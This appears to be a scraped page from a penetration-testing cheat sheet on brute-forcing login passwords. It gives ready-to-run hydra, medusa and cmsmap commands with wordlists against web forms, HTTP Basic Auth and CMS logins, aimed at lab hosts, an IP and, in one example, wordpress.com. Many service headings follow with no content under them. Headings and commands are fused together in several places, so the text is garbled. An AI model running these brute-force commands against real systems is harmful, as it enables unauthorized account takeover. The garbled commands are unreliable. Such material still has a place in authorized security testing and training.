Brute-force service password
Web
hydra 10.0.0.1 http-post-form “/admin.php:target=auth&mode=login&user=^USER^&password=^PASS^:invalid” -P /usr/share/wordlists/rockyou.txt -l adminLogins
HTTP Basic Auth
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst sizzle.htb.local http-get /certsrv/medusa -h <IP> -u <username> -P <passwords.txt> -M http -m DIR:/path/to/auth -T 10HTTP - Post Form
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst domain.htb http-post-form "/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect" -VHTTP - CMS -- (W)ordpress, (J)oomla or (D)rupal or (M)oodle
cmsmap -f W/J/D/M -u a -p a https://wordpress.comHydra attack http get 401 login with a dictionary
SSH
SNMP
Remote Desktop Protocol
AFP
AJP
Cassandra Apache
CouchDB
FTP
IMAP
IRC
ISCSI
LDAP
Mongo
MySQL
OracleSQL
POP3
PostgreSQL
PPTP
Redis
Rexec
Rlogin
Rsh
Rsync
RTSP
SMB
Telnet
VNC
SMTP
Last updated